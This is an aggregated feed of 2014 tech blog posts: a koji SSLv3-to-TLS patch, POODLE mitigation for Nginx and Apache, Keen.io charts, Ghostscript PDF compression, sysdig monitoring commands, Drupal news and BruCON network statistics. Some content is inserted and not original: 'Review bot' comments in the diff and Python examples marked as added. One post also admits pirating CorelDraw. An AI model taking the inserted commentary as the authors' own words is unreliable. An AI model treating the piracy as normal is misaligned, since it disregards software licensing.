- --- SSLCommon.py.orig    2014-10-15 11:42:54.747082029 +0200
+++ SSLCommon.py    2014-10-15 11:44:08.215257590 +0200
@@ -37,7 +37,8 @@
if f and not os.access(f, os.R_OK):
raise StandardError, "%s does not exist or is not
readable" % f

- -    ctx = SSL.Context(SSL.SSLv3_METHOD)   # SSLv3 only
+    #ctx = SSL.Context(SSL.SSLv3_METHOD)   # SSLv3 only
+    ctx = SSL.Context(SSL.TLSv1_METHOD)   # TLSv1 only
ctx.use_certificate_file(key_and_cert)
ctx.use_privatekey_file(key_and_cert)
ctx.load_client_ca(ca_cert)
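Review bot: SSL.TLSv1_METHOD pins the client to exactly TLS 1.0, so there is no version negotiation at all and a server that later allows only TLS 1.1/1.2 becomes unreachable; since the goal stated above is to stop speaking SSLv3 rather than to require 1.0, the negotiating method SSL.SSLv23_METHOD combined with OP_NO_SSLv2 | OP_NO_SSLv3 in set_options would pick the highest version both ends support. Also, the old line is left commented out ("#ctx = SSL.Context(SSL.SSLv3_METHOD)"); the diff already records the history, so delete it rather than keep it.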
@@ -45,7 +46,8 @@
verify = SSL.VERIFY_PEER | SSL.VERIFY_FAIL_IF_NO_PEER_CERT
ctx.set_verify(verify, our_verify)
ctx.set_verify_depth(10)
- -    ctx.set_options(SSL.OP_NO_SSLv2 | SSL.OP_NO_TLSv1)
+    #ctx.set_options(SSL.OP_NO_SSLv2 | SSL.OP_NO_TLSv1)
+    ctx.set_options(SSL.OP_NO_SSLv2 | SSL.OP_NO_TLSv1 | SSL.OP_NO_SSLv3)
return ctx
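Review bot: the new set_options call keeps SSL.OP_NO_TLSv1 while the previous hunk switched the context to TLSv1_METHOD, so the option set now forbids the only protocol the method can speak; version-specific methods in OpenSSL 1.0.x largely ignore the OP_NO_* flags, which is why this still appears to work, but the combination is contradictory and the comment "# TLSv1 only" no longer matches the options. Suggested: "ctx.set_options(SSL.OP_NO_SSLv2 | SSL.OP_NO_SSLv3)", and, as in the first hunk, drop the commented-out old line instead of keeping it.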
=====================================================

We'll keep you informed about possible upstream koji packages that would default to at least TLSv1.

If you encounter a problem, feel free to drop into the #centos-devel channel on irc.freenode.net and have a chat with us.

by fabian.arrotin at October 15, 2014 10:46 AM

Mattias Geniar

Patch your webservers for the SSLv3 POODLE vulnerability (CVE-2014-3566)

First, read this: CVE-2014-3566.

Next: realise that the vulnerability in SSLv3 isn't limited to just webservers. It's any client or server that uses the SSLv3 protocol: from SSL tunnels to encryption services to remote management interfaces.

Here's how to apply a quick patch to Nginx and Apache to disable SSLv3 entirely. The current stats show about 0.5-3% of the internet still uses this (mostly Windows XP with IE6), and they will effectively be blocked from using the HTTPS sites. But since both Windows XP and IE6 have long passed their maximum expiration date, I wouldn't bother.

Internally at Nucleus, we had a brief discussion about this which eventually just ended in the following statement / conclusion.

Here's the situation: SSLv3 has been found to have a major flaw, allowing the traffic to be decrypted (link)

SSLv3 is an 18-year-old protocol that has flaws. If we disable the SSLv3 protocol to fix this flaw, we effectively block any Windows XP user with IE6 from accessing the site. Windows XP with newer browsers (IE6+ or Firefox/Chrome) will not have any problem.

The "problem" is in the way SSL works: any browser can be tricked into downgrading the SSL connection from a secure TLS 1.2 to the old SSLv3. That includes any recent browser. So if we support SSLv3 for older Windows XP/IE6, we effectively make all other -- modern -- browsers vulnerable as well.

Here's the million dollar question: can we disable SSLv3, knowing full well that we then block all Windows XP users with IE6 from accessing the site? Or should we still support SSLv3, effectively rendering SSL mostly useless for _all_ users on the site (because of the SSLv3 downgrade possibilities)?

Keeping the comments above in mind, here is how to disable SSLv3.

Nginx

Change this:

ssl_protocols               SSLv3 TLSv1 TLSv1.1 TLSv1.2;

To this:

ssl_protocols              TLSv1 TLSv1.1 TLSv1.2;

Remove SSLv3 from the Nginx ssl_protocols directive, then restart your Nginx service.

Apache

Add the following in your SSL configurations to disable support for older SSLv2 and SSLv3 protocols.

SSLProtocol All -SSLv2 -SSLv3

After the change, restart Apache to make the changes apply.
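As an added example (not from the post), a small Python check that evaluates the two directives above on constructed config snippets and reports whether SSLv3 would still be negotiated; the expansion of Apache's "all" keyword is an assumption taken from the mod_ssl documentation for OpenSSL 1.0.1+ builds (older builds add SSLv2 to it).

```python
"""Check Nginx / Apache protocol directives for lingering SSLv3 support.

Added example, not part of the original post. It evaluates the two directives
shown above (nginx "ssl_protocols", Apache "SSLProtocol") on constructed config
snippets and reports whether SSLv3 would still be negotiated.
"""
import re

# Protocols Apache's "all" keyword expands to; assumption based on the mod_ssl
# documentation for OpenSSL 1.0.1+ builds (older builds include SSLv2 as well).
APACHE_ALL = {"SSLv3", "TLSv1", "TLSv1.1", "TLSv1.2"}

# Canonical spelling so that Apache's case-insensitive tokens compare cleanly.
_CANON = {p.lower(): p for p in APACHE_ALL | {"SSLv2"}}


def apache_protocols(directive_value):
    """Return the set of protocols enabled by an "SSLProtocol" value.

    Apache semantics: "all" selects every protocol, "+X" adds one, "-X"
    removes one, and a bare "X" (no prefix) adds one. Evaluation is
    left to right, so "All -SSLv2" still leaves SSLv3 enabled.
    """
    enabled = set()
    for token in directive_value.split():
        if token[0] in "+-":
            op, name = token[0], token[1:]
        else:
            op, name = "+", token
        if name.lower() == "all":
            names = set(APACHE_ALL)
        else:
            names = {_CANON.get(name.lower(), name)}
        if op == "-":
            enabled -= names
        else:
            enabled |= names
    return enabled


def nginx_protocols(directive_value):
    """Return the protocols listed in an nginx "ssl_protocols" value
    (nginx simply enables exactly what is listed)."""
    return set(directive_value.split())


_NGINX_RE = re.compile(r"^\s*ssl_protocols\s+(.+?)\s*;", re.MULTILINE)
_APACHE_RE = re.compile(r"^\s*SSLProtocol\s+(.+?)\s*$",
                        re.MULTILINE | re.IGNORECASE)


def find_sslv3(config_text):
    """Scan a config blob and return (directive, enabled protocols) pairs for
    every protocol directive that still permits SSLv3."""
    findings = []
    for m in _NGINX_RE.finditer(config_text):
        enabled = nginx_protocols(m.group(1))
        if "SSLv3" in enabled:
            findings.append(("ssl_protocols " + m.group(1), enabled))
    for m in _APACHE_RE.finditer(config_text):
        enabled = apache_protocols(m.group(1))
        if "SSLv3" in enabled:
            findings.append(("SSLProtocol " + m.group(1), enabled))
    return findings


# Constructed sample snippets: the weak settings beside the fixed ones.
# ("SSLProtocol All -SSLv2" is the common pre-POODLE Apache setting.)
WEAK_CONFIG = """
ssl_protocols               SSLv3 TLSv1 TLSv1.1 TLSv1.2;
SSLProtocol All -SSLv2
"""

FIXED_CONFIG = """
ssl_protocols              TLSv1 TLSv1.1 TLSv1.2;
SSLProtocol All -SSLv2 -SSLv3
"""

if __name__ == "__main__":
    for label, cfg in (("weak", WEAK_CONFIG), ("fixed", FIXED_CONFIG)):
        findings = find_sslv3(cfg)
        if not findings:
            print("%s: no directive enables SSLv3" % label)
        for directive, enabled in findings:
            print("%s: SSLv3 still enabled by %r -> %s"
                  % (label, directive, sorted(enabled)))
```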

by Mattias Geniar at October 15, 2014 05:02 AM

October 14, 2014

Frederic Descamps

Get Things Gnome : synchronize multiple computers

For many years now I have used GTG to manage my todo lists. (it can even be ).

I tried to use the Remember The Milk service to sync my laptop and my desktop, but it wasn't really working well. Then I discovered a nice project: GTGonline, a Django project that allows synchronization to and from GTG via a backend called backend_gtgonline.

I forked the project to create a branch (that will never be merged, it seems) so as not to hardcode the
URL of the service, as I host my own version of the GTGonline backend.

My branch is https://github.com/lefred/backend_gtgonline/tree/service-url and I also provide an rpm package for Fedora 20.

Attachment: gtg-backend-gtgonline-0.1-1.fc20.noarch.rpm (15.96 KB)

by lefred at October 14, 2014 09:37 PM

Amedee Van Gasse

VRT picks photos from Twitter without permission

In early September I was visiting a family member at AZ Nikolaas. That weekend the Vredefeesten were taking place in Sint-Niklaas, during which dozens of hot-air balloons take off from the Grote Markt. A spectacular sight that draws tens of thousands of onlookers every year.
From the fifth floor of AZ Nikolaas I had a nice view over the city and the balloons flying past. I used the panorama function of my Nexus 4 and posted the photo on Twitter:

In the photo you can see a wing of the AZ Nikolaas building, and I also got a concerned reaction from @mariegoos.
A while later my photo was also retweeted in full by the official Twitter account of @stadsintniklaas. Nice.

The next day an acquaintance told me that my photo had been used on the VRT website deredactie.be. I went looking (with Google Image Search) and indeed, the photo appears with 2 articles:

I'm actually not so happy about that. OK, my name is mentioned, but is that really necessary, VRT? Is this the result of the imposed budget cuts? 92,000 people came to the Vredefeesten; were there really no professional photographers among them? Those people have to earn their bread and butter too! I'm just an amateur who was fiddling around a bit with his smartphone, and I don't even think it's a nice photo myself.

I made some inquiries with photographer friends (thank you Monica and Evy) and I consulted the SOFAM rates. Apparently I can ask 110.30 euro per use of a photo, + 200% damages because no permission was asked or given, + 200% damages for violation of integrity (because they cropped a piece off, so the context of AZ Nikolaas was lost).
That comes to a total of 1103 euro.

And NO, just because something is on Twitter, Facebook, Instagram or the like does not mean you can simply use it. According to Twitter's rules you may only reproduce a tweet as an embedded tweet, like my tweet above. So the complete tweet, including the context. Not a piece of the tweet, such as (part of) a photo.

I have sent an expense note to the VRT. The amount they will pay me (if any), I will transfer in full to the Fonds Pascal Decroos voor Onderzoeksjournalistiek.

EDIT: this blog post has been published for less than half an hour and I already see a referral in Google Analytics from contactbeheer.vrt.be. So they have seen it.

The post VRT plukt foto’s van Twitter zonder toestemming appeared first on amedee.be.

by Amedee Van Gasse at October 14, 2014 09:23 AM

Frank Goossens

Lovely Music; “Neerhof” by Lieven

Last weekend, with some delay (thank you HD recorder), I enjoyed “Belpop” about the impressive career of Jean Blaute. The best part came right at the end, when you heard him sing a piece of “Neerhof” by Lieven (Coppieters) together with Eric Melaerts, from their “Gedeelde Adoraties” tour. This is the original:

YouTube Video

“Neerhof” comes from Lieven's only album, Jus D’orange from 1976, which was recorded with a string of jazz musicians (including Marc Moulin, Eef Albers and Bruno Castellucci). But the song stands rock solid, even without lyrics, arrangements and 1970s guitar and flute solos; just listen to this “Guitar CHORDS” version uploaded by Coppieters himself.

by frank at October 14, 2014 05:22 AM

October 12, 2014

Mattias Geniar

You Need Passion

(This article was written in May 2012, but for some reason never got published. Better late than never, I assume)

I read, with great interest, Davy Kesten's article on "Just do it". It's to-the-point and he makes very compelling arguments, which for the most part I agree with.

There is just one quote that bothered me in that article.

The difference between successful entrepreneurs and jokers isn't passion. It isn’t luck. It isn’t money. It isn’t their network. It isn’t knowledge. It’s the fact that they simply DO.

Passion.

Perhaps I've read the article with another mindset (not that of an entrepreneur) but that doesn't matter. The article is about accomplishing your goals instead of talking about it, and that's true for everyone -- regardless of what you do in life. But if you want to accomplish something, you need to be passionate about it. If you are truly passionate, you'll accomplish your goals no matter what. You'll "just do" automatically, because you *want to*. It's what drives you.

I'm a geek myself, and the article reminded me of a quote I particularly like. It's hard to track the original source of this, but from what I can tell it could be @hijinksensue on Twitter.

Geeks don't just have interests, they have passions.

If you're passionate about something, you'll go for it. It's that simple. Whether it's coding a new app, discovering a new tool you want to master or traveling around the world, if you're truly passionate you will achieve your goals.

To me, the difference between a "doer" and a "joker" isn't just the fact that they "just do it", but whatever it is that drives them to "just do" in the first place.

by Mattias Geniar at October 12, 2014 08:22 AM

October 11, 2014

Vincent Van der Kussen

Ansible and Opennebula

Recently we decided to deploy a private cloud to replace our RHEV setup. The reasoning behind this will be covered in another blog post, but the main reason was the higher level of automation we could achieve with Opennebula compared to RHEV. In this post I would like to talk about how we used Ansible to help us with the setup of Opennebula and what we are going to do in the near future.

Why Ansible? Well, we were already using Ansible to perform repeatable deployments in our test environments to save us some valuable time compared to "manual" setups. This way we can test new code or deploy complete test environments faster.

So when we decided to deploy Opennebula we started writing Ansible playbooks from the very start, because we wanted to test several setups until we had a configuration that we found performant enough and that was configured the way we wanted. This allowed us to rebuild the complete setup from scratch (using Cobbler for physical deployments) and have a fresh setup 30 minutes later. This included a fully configured setup with the Opennebula management node, hypervisors (KVM) and everything we needed to further configure our Gluster storage backend.

One of the advantages of Ansible is that it is not just a configuration management tool but can do orchestration too. Opennebula, for example, uses SSH to communicate with all the hypervisor nodes. So during the deployment of a hypervisor node we use delegate_to to fetch the earlier generated SSH keys and deploy them on the hypervisor. Pretty convenient.

We currently have quite complete playbooks that use a combination of 3 roles. They do need some testing and when we feel they can be used by other people too, we'll put them on the Ansible Galaxy.

Until now we haven't used Ansible to keep our config in sync or to do updates, but it's something we have in the pipeline and should be quite trivial using the current Ansible playbooks.

Another thing we'll start working on is modules to support Opennebula. We already had a look at the possibilities Opennebula provides and they should be quite trivial to build using its API.

We are very pleased with both projects as they aim to keep things simple which is important to us since we are a very small team and have to move forward at a rather fast pace.

The playbooks can be found on GitHub.

by Vincent Van der Kussen at October 11, 2014 10:00 PM

October 10, 2014

Sébastien Wains

PreserveFQDN and EscapeControlCharactersOnReceive with rsyslog

In legacy versions of rsyslog, if you want to use the option PreserveFQDN, you have to set it before anything else, or it won't work.

If you are having issues sending logs from nxlog on Windows to rsyslog legacy, you might want to have a look at EscapeControlCharactersOnReceive.

http://www.rsyslog.com/doc/rsconf1_escapecontrolcharactersonreceive.html

by Sébastien at October 10, 2014 06:14 PM

Frederic Hornain

CME Group finds a long-term partner in Red Hat

KR

Frederic


by Frederic Hornain at October 10, 2014 07:06 AM

October 09, 2014

Dieter Adriaenssens

Custom multiseries trend using Keen.io API

The initial goal was to create a trend of event data related to the time of day or day of week when the event occurred. Later on, it seemed like a good idea to display different timeframes on the same trend.

The end result shows a trend, calculating an average value of a metric (buildtime duration, in this example) for all events that occurred in the same time interval (day of week, in this example), for different timeframes (last week, month and year, in this example), which are displayed as different series in the same chart, to be able to compare them and visually notice an evolution or an anomaly.

This trend is part of the Buildtime Trend project; you can see the code in action here.

Read on to see how it is done.
The Keen.io service and API are used to store, analyse and visualise the event data. I'd like to refer to the Keen.io tutorials on how to create a query and generate a chart.

Generate and group by time intervals

 

First of all, the event data has a timestamp, so in a simplified example, an event would look like this:

  { id: "1234abcd", duration: "97", timestamp: "2014-10-09T18:32:14Z"}

But to group events on time intervals, like day of week, or hour (time of day), the timestamp has to be split into its components (thanks to Ryan Spraetz of Keen.io for the suggested workaround), for example:

  {id: "1234abcd",
    duration: "97",
    timestamp: {
      isotimestamp: "2014-10-09T18:32:14Z",
      day_of_week: 4,
      hour_24: 18,
      hour_12 : 6,
      hour_AMPM : "PM",
      ...
    }
  }


Look here for the code to split the timestamp (in Python) and a full example of a split timestamp.

A query to group events by day of week, calculating an average value of duration, for all events of the last week, would look like this:

var queryLastWeek = new Keen.Query("average", {
  eventCollection: "builds",
  timeframe: "last_week",
  targetProperty: "duration",
  groupBy: "timestamp.day_of_week"
});

Using an example from the Keen.io tutorial, you could easily create a chart with one series of data.
If timeframe is changed to 'last_month' or 'last_year', you get the same query for a longer timeframe.
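As an added example (not the Buildtime Trend project's own code), the timestamp split described above implemented in Python, followed by a local aggregation that computes the same thing as the "average ... groupBy timestamp.day_of_week" query, so the server-side result can be sanity-checked against constructed events; the sample events and the 0 = Sunday convention are assumptions chosen to match the 'Sun'..'Sat' captions used for the chart.

```python
"""Split ISO-8601 timestamps into groupable components and aggregate on them.

Added example, not code from the Buildtime Trend project. It reproduces the
timestamp layout shown above (day_of_week, hour_24, hour_12, hour_AMPM) and
then computes locally what the Keen.io "average ... groupBy
timestamp.day_of_week" query computes server-side.
"""
from collections import defaultdict
from datetime import datetime

ISO_FORMAT = "%Y-%m-%dT%H:%M:%SZ"


def split_timestamp(iso_string):
    """Return a dict in the shape shown above. day_of_week uses 0 = Sunday,
    matching the 'Sun'..'Sat' index captions used for the chart (assumption)."""
    dt = datetime.strptime(iso_string, ISO_FORMAT)
    hour_24 = dt.hour
    return {
        "isotimestamp": iso_string,
        # Python's weekday() is 0 = Monday; shift so that Sunday becomes 0.
        "day_of_week": (dt.weekday() + 1) % 7,
        "hour_24": hour_24,
        "hour_12": hour_24 % 12 or 12,  # 0 -> 12 AM, 12 -> 12 PM, 18 -> 6 PM
        "hour_AMPM": "PM" if hour_24 >= 12 else "AM",
    }


def average_by(events, group_key, target_property="duration"):
    """Average target_property over events sharing the same value of
    group_key (a dotted path such as "timestamp.day_of_week"). Returns the
    Keen.io-style list of {group_key: value, "result": average} rows."""
    totals = defaultdict(lambda: [0.0, 0])
    for event in events:
        value = event
        for part in group_key.split("."):
            value = value[part]
        totals[value][0] += float(event[target_property])
        totals[value][1] += 1
    return [
        {group_key: key, "result": total / count}
        for key, (total, count) in sorted(totals.items())
    ]


# Constructed sample events in the raw shape from the post, before splitting.
RAW_EVENTS = [
    {"id": "1234abcd", "duration": "97", "timestamp": "2014-10-09T18:32:14Z"},
    {"id": "1234abce", "duration": "103", "timestamp": "2014-10-02T09:05:00Z"},
    {"id": "1234abcf", "duration": "60", "timestamp": "2014-10-05T00:12:41Z"},
]

# The same events with the timestamp replaced by its split components.
EVENTS = [dict(e, timestamp=split_timestamp(e["timestamp"])) for e in RAW_EVENTS]

if __name__ == "__main__":
    for row in average_by(EVENTS, "timestamp.day_of_week"):
        print(row)
```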

Combine several queries in one chart


So now we have 3 queries: queryLastWeek, queryLastMonth and queryLastYear.

They are passed as parameters to the Keen.io client.run method, where the results of the 3 queries are merged into one array by the method mergeSeries (see below). This merged array (chart_data) is passed to Keen.Visualization to draw the chart you can see at the top of this post:
var request = client.run([queryLastWeek, queryLastMonth, queryLastYear], function() {
  var series_captions = ["Last week", "Last month", "Last year"];
  var index_captions = ["Sun", "Mon", "Tue", "Wed", "Thu", "Fri", "Sat"];
  // this.data holds one result set per query, in the order given above
  var chart_data = mergeSeries(
    this.data,
    index_captions,
    "timestamp.day_of_week",
    series_captions
  );
  // draw chart
  window.chart = new Keen.Visualization(
    {result: chart_data},
    document.getElementById("chart_avg_buildtime_weekday"),
    {
      chartType: "columnchart",
      title: "Average buildtime per day of week",
      chartOptions: {
        vAxis: { title: "duration [s]" },
        hAxis: { title: "Day of week" }
      }
    });
});

You can find the full code here.

Merge data series

First, this method creates a multilevel array with i rows (one for each series; in this example i = 3 (week, month, year)) and j columns (one for each index value in the query; in this example j = 7: 'Sun' to 'Sat').
Then the method takes the Keen.io data array, with the results of all queries, as a parameter, loops over the result from each query and assigns the values to the corresponding index in the multilevel array. As a result, all values corresponding to 'Monday' will be in the same place in the array.
function mergeSeries(data, index_captions, value_caption, series_captions) {
  var chart_data = [];
  var i, j, index, timeframe_result, timeframe_caption;
  // create and populate data array: one row per index value ('Sun'..'Sat'),
  // with every series initialised to 0 so missing days still render
  for (i = 0; i < index_captions.length; i++) {
    chart_data[i] = {caption: index_captions[i]};
    // populate all series
    for (j = 0; j < series_captions.length; j++) {
      chart_data[i][series_captions[j]] = 0;
    }
  }
  // loop over all query result sets (one per timeframe)
  for (j = 0; j < data.length; j++) {
    timeframe_result = data[j].result;
    timeframe_caption = series_captions[j];
    // copy query data into the populated array
    for (i = 0; i < timeframe_result.length; i++) {
      index = parseInt(timeframe_result[i][value_caption], 10);
      // skip values that do not map onto a row (missing or out of range)
      if (isNaN(index) || index < 0 || index >= chart_data.length) {
        continue;
      }
      chart_data[index][timeframe_caption] = timeframe_result[i]["result"];
    }
  }
  return chart_data;
}

Some improvements

Some ideas to make it more efficient:

by Dieter Adriaenssens (noreply@blogger.com) at October 09, 2014 10:33 PM

Dries Buytaert

Acquia honored by Belgian-American Chamber of Commerce


My company Acquia was honored this week by BelCham, the Belgian-American Chamber of Commerce, as the "Company of the Year". I'm proud of this honor, which speaks to the great work that our team of more than 500 Acquians from around the globe do for our customers every day.

BelCham is an organization dedicated to helping Belgian entrepreneurs navigate the complexities of Belgian-American trade. Companies like Acquia, InBev, Brussels Airlines, and restaurant chain Le Pain Quotidien support BelCham's work.

If you want to build a big company, then at some point you have to scale globally. Scaling a business globally is challenging. I try to give back some of my experience by advising Belgian entrepreneurs that want to move or expand to the US. I often recommend they get in touch with BelCham, because they can help entrepreneurs find the resources they need to extend their network and grow globally.

by Dries at October 09, 2014 07:57 AM

October 07, 2014

Joost Damad

Driving WS2812 Programmable RGB LEDs using hardware SPI

New blog post available at:

http://www.productize.be/driving-ws2812-programmable-rgb-leds-using-hardware-spi/

by Joost Yervante Damad (noreply@blogger.com) at October 07, 2014 07:15 AM

Frank Goossens

My alternative for m.deredactie.be

I already wrote here that I wasn't happy with the renewed mobile redactie.be. But any blogger can spout criticism; tearing down is easier than building up, and the best argument is a worked-out alternative. So, over the past months, in between the soup and the potatoes, I worked on my own “progressive enhanced” Proof of Concept of a mobile deredactie.be (in PHP) that works on all browsers, uses less mobile data and renders faster (this is where you need to be, impatient one).

Why do I think this attempt is better than the official version from the VRT? Well, the POC

You can:

A few technical facts;

So, that's about it. Take a look, give feedback, fork it on GitHub, fix bugs, add features. But whatever you do, don't forget that the content is and remains VRT's, and that you therefore can't just do whatever you want with it.

by frank at October 07, 2014 04:59 AM

October 05, 2014

Mattias Geniar

Compress a PDF file on Linux via the CLI

If you're processing large PDF files, you may want to optimize the filesize. Here's what I found to be working. These tools all require Ghostscript.

$ yum install ghostscript
$ apt-get install ghostscript

Convert the PDF to the "ebook" format. For a few tests, this took 65% of the original filesize (18MB to 6MB).

$ gs -sDEVICE=pdfwrite -dCompatibilityLevel=1.4 -dPDFSETTINGS=/ebook \
       -dNOPAUSE -dBATCH  -dQUIET -sOutputFile=output.pdf input.pdf

You can also try the "screen" format. This reduced the test PDFs from 18MB to 1.5MB, so a very large reduction, but the image quality inside the PDF was no longer up to standard.

$ gs -sDEVICE=pdfwrite -dCompatibilityLevel=1.4 -dPDFSETTINGS=/screen \
       -dNOPAUSE -dBATCH  -dQUIET -sOutputFile=output.pdf input.pdf

I've read reports that using Ghostscript's pdf2ps and ps2pdf to convert the PDF to PostScript and back to PDF can also substantially reduce the filesize. My tests did not confirm this: I ended up with files 15% larger. You'll need to test this for your own needs.

$ pdf2ps original.pdf original.ps
$ ps2pdf original.ps new.pdf

And when all else fails, just compress the file with zip (zip instead of gzip/tar, to help our Windows friends with opening the files more easily).

$ zip file.zip original.pdf

Should anyone else have more tips, I'd love to hear them!

by Mattias Geniar at October 05, 2014 12:52 PM

October 03, 2014

Frank Goossens

Music from Our Tube; Lizzy Parks’ Prayer

My wife loves vocal jazz and while listening to one of the many online streaming radio stations during dinner just now, Lizzy Parks’ Prayer grabbed us by the ears;

YouTube Video

The beautiful arrangements remind me of Minnie Ripperton’s “Les Fleurs” (or 4Hero’s almost facsimile rendition). There’s worse than that, I guess?

by frank at October 03, 2014 04:52 PM

Thomas Vander Stichele

I think it’s better to look odd than to look normal

In the fall of ’98 I had a thing for a girl I didn’t want to have a thing for. I had also just seen one of my favorite movies, Much Ado About Nothing (the original Brannagh movie, not the Josh Whedon one that I didn’t know about until recently and have yet to see).

I decided to exorcise my feelings into a good old-fashioned mix cd (well, I guess that wasn’t old fashioned back in ’98). I cut up the movie dialogue into pieces, and interspersed them in between a song selection aiming to match the flow of the movie lyric-wise and, in places, matching them sound-wise too to the movie snippets. It ended up being two cd’s, and a bunch of my friends liked it as well so I think I ended up making about 30 copies of the thing.

Today I needed to recreate those two CD’s plus its original packaging. That means I had to actually buy CD-R’s (didn’t have any anymore after the move to the US), buy jewelcases (can you believe that I actually have actual boxes with actual empty jewelcases that I *kept* in storage in Belgium? These days if you want to buy them they’re a little harder to find than they used to be, even though I’m sure there must be landfills full of them all over the world), and go to a print shop to print the front and back covers.

Being the obsessive backupper that I am, it was easy to find the sound files back (actually, I took a morituri rip that I made at my best friend’s house, who has the CD’s, last time I was there – so that I would have a perfect .cue sheet that would stitch the tracks together). I knew I had the files for the fronts and backs somewhere as well, but they were a little harder to find because I couldn’t remember their names. But I trusted my OCD self that I had backups from fifteen years ago somewhere here with me in NY, and I started looking for files from the same timeframe, until I came across the files I was looking for hidden in a subdirectory.

But then when you find them, what do you do with .cdr CorelDraw files from 1998? I tried inkscape, which uses uniconvertor, which on my F-19 machine failed with a constructor with wrong arguments in Python, which seems like a silly bug. I rebuilt the F-21 version, which gets past that bug, but then doesn’t actually convert anything. I tried an online converter, and it only picked up on the images and none of the text.

So I went the illegal route – I downloaded CorelDraw 11 from the internet, installed it in wine (which was surprisingly easy, it just worked), and I could open the files. Except that it was missing fonts and so the layout was all wrong. Sigh. Hunt random font sites for the missing fonts, install them for wine, open again, rinse, repeat. Eventually the files opened with the right fonts, except that one of the titles was too big to fit on the CD inlay. Oh well, adjust them all manually, make it a little smaller, export to eps, load in gimp, adjust the page as it was perfectly measured for A4 printing but I’m in the US now and the US uses letter which is slightly different, export to pdf so I could go to any random print shop in New York and get it printed.

CD burnt, on to the print shop, fiddle with the printer as nobody in the store can figure out which tray number the tray is where they loaded the card stock paper, and it’s not like the driver on the windows machine knows either – I had to do 5 failed prints to different printers before we even knew which printer was the right one. Cut up the paper by hand with scissors (which I suck at), put it all together, and be on my way.

All this just to say that, while I can be as good about backups as I want to be to bring back to life something I did fifteen years ago, there is still a whole lot of real-world technology fails getting in the way, like outdated proprietary file formats, not having good interchange formats, missing fonts, paper sizes and general Imperial/metric nonsense, ages-old printer crap and just simple manual tasks, which we as humans will probably inflict upon ourselves for forever. I mean, I’d sure like to believe that in the future it will be as simple as pressing a button and getting this 15 year old CD project 3D-printed all at once, but experience has taught me that most likely I will be fiddling just as much with getting 2040’s 3D printer to work with 2025’s data files.

And so it is that I arrive just after 6 at Barnes and Noble in Tribeca, queue up in front of eight registers with only one open, buy a book, get a wristband, go to the back where Emma Thompson is reading from her Peter Rabbit book, in her perfectly English and genuinely funny way, queue after the reading, and hear her say “I think it’s better to look odd than to look normal” to the seven year old twin girls in front of me. I wholeheartedly agree with her. I hand her my copy to sign, give her my two cd’s and tell her what they are and say that I thought this was a good opportunity to give them to her, and she smiles and seems genuinely surprised and pleased.

I think my dad would be genuinely jealous at this point – he always seemed to appreciate seeing her on the screen, and after today I can’t say I blame him. I hope she enjoys the CD’s, and if someone can recommend a good website where I can put these online for others to listen to, that would be great!


by Thomas at October 03, 2014 04:19 PM

Mattias Geniar

Sysdig CLI examples

Here are some SysDig examples for your CLI. Looking for an easy way to install SysDig on your servers? Check out my puppet-sysdig module if you're a Puppet user.

Observe the I/O activity on all the files named 'passwd'

$ sysdig -A -c echo_fds "fd.filename=passwd"

See the top directories in terms of R+W disk activity

$ sysdig -c fdbytes_by fd.directory "fd.type=file"

Print the top files that apache has been reading from or writing to

$ sysdig -c topfiles_bytes proc.name=httpd

See the top files in terms of read+write bytes

$ sysdig -c topfiles_bytes

List the processes that are using a high number of files

$ sysdig -c fdcount_by proc.name "fd.type=file"

See the top processes in terms of disk bandwidth usage

$ sysdig -c topprocs_file

See the top client IPs: in terms of total bytes

$ sysdig -c fdbytes_by fd.cip

See the top client IPs: in terms of established connections

$ sysdig -c fdcount_by fd.cip "evt.type=accept"

See the top local server ports: in terms of established connections

$ sysdig -c fdcount_by fd.sport "evt.type=accept"

Show network data exchanged with a specific host IP

As ASCII:

$ sysdig -s2000 -A -c echo_fds fd.cip=10.3.6.1

As binary:

$ sysdig -s2000 -X -c echo_fds fd.cip=10.3.6.1

Show all syslog messages from the system, conveniently color coded

$ sysdig -c spy_syslog

by Mattias Geniar at October 03, 2014 02:42 PM

October 02, 2014

Wim Leers

Render caching in Drupal 7 and 8

Together with Fabian Franz & Marco Molinari from Tag1 Consulting, I had a session about render caching in Drupal 7 and 8 at DrupalCon Amsterdam.

Marco explained the render performance problems in Drupal 7, the way the Render Cache module for Drupal 7 mitigates these performance problems as well as possible in Drupal 7, but can’t solve everything, because the necessary mechanisms to solve it properly aren’t available there. I explained how cache tags in Drupal 8 have fixed this problem in Drupal 8 completely. And Fabian demonstrated very cool things for the near future: different rendering strategies, such as Facebook’s Big Pipe — which already works in the render_cache module for Drupal 7, and will only be simpler to implement in Drupal 8!

by Wim Leers at October 02, 2014 12:43 AM

October 01, 2014

Dries Buytaert

State of Drupal presentation (September 2014)

I gave my traditional State of Drupal presentation this week at DrupalCon Amsterdam. I decided to talk about the sustainability and scalability of the Drupal community. In case you didn't attend DrupalCon Amsterdam, you can watch the recording of my keynote, download a copy of my slides (PDF, 17 MB) or read my blog post on the topic.

by Dries at October 01, 2014 12:41 PM

Drupal 8 beta 1 released


Today we announced Drupal 8 beta 1! This key milestone is the work of over 2,300 people who have contributed more than 11,500 committed patches to 15 alpha releases, and especially the 234 contributors who fixed 178 "beta blocker" issues. A massive thank-you to everyone who helped get Drupal 8 beta 1 done.

For more information on the beta, please read the beta 1 release announcement. To read about the new features in Drupal 8, see Drupal.org's Drupal 8 landing page.

Betas are for developers and site builders who are comfortable reporting (and where possible, fixing) their own bugs, and who are prepared to rebuild their test sites from scratch if necessary. Beta releases are not recommended for non-technical users, nor for production websites.

by Dries at October 01, 2014 09:21 AM

September 30, 2014

Xavier Mertens

BruCON 0x06 Network Review

Once again, here is my quick review of the BruCON network that we deployed for our beloved attendees! Yes, we are glad to take care of your packets during the conference. Nothing changed since the last edition: we deployed the same network in the same venue with the same controls in place. But this year, the biggest change was our brand new wall of sheep…

Let’s start with some stats! Our Internet bandwidth was the same as last year: a 100 Mbit/s wireless link. This was enough, as we had peaks of up to 80 Mbit/s of traffic. Alas, the partner that provides our Internet pipe is still not ready to deliver IPv6.

Traffic Overview

We provide two networks: a “public” one for the visitors and a “private” one for the crew and the speakers, which is not sniffed. The Wi-Fi network is the most used, but more and more people decided to stick to 3G/4G connectivity to avoid connecting to the wild network. We detected 334 unique MAC addresses which requested an IP address during the conference. The split across the different client types is shown below.

As for the applications used, HTTP is in first position, not a surprise. While HTTP remains the top protocol, SSL and OpenVPN came in 2nd and 3rd position, which means that people also tend to use encrypted communications.

DNS is always a goldmine. Here is a top-20 of the requests we captured (based on DNS traffic, whatever DNS servers were used!). To clean up the mess, I removed the PTR requests.

Count Query
28847 google
25334 a.t
19089 google.com
11895 wpad
9113 t.co
5738 brucon
5487 brucon.org
